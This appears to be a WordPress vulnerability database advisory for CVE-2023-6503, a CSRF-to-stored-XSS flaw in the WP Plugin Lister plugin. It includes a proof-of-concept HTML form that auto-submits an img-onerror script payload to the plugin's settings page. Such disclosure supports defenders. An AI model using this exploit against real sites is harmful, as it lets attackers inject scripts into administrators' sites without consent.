WP Plugin Lister <= 2.1.0 – Settings Update to Stored XSS via CSRF | CVE 2023-6503 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.

Proof of Concept

Make an admin open an HTML page containing the following code:

<form action="https://example.com/wp-admin/options-general.php?page=plugin_lister.php&time=1670618030" method="POST">
    <input type="text" name="title" value='"><img src=x onerror=alert(1)>'>
    <input type="text" name="description" value='"><img src=x onerror=alert(1)>'>
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

wp-plugin-lister

No known fix

References

CVE

URL

https://magos-securitas.com/txt/CVE-2023-6503.txt

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

0d95de23-e8f6-4342-b19c-57cd22b2fee2

Timeline

Publicly Published

2024-01-03 (about 4 months ago)

Added

2024-01-03 (about 4 months ago)

Last Updated

2024-01-04 (about 4 months ago)

Other

Published

Title

Published

2021-07-16

Title

WordPress Photo Gallery – Image Gallery <= 1.0.6 - Cross-Site Request Forgery

Published

2023-03-10

Title

GiveWP < 2.25.2 - Cross-Site Request Forgery

Published

2023-12-28

Title

NEX-Forms – Ultimate Form Builder < 8.5.5 - Cross-Site Request Forgery

Published

2023-11-06

Title

Feather Login Page < 1.1.4 - CSRF

Published

2023-02-27

Title

Read More Excerpt Link < 1.6.1 - Settings Update via CSRF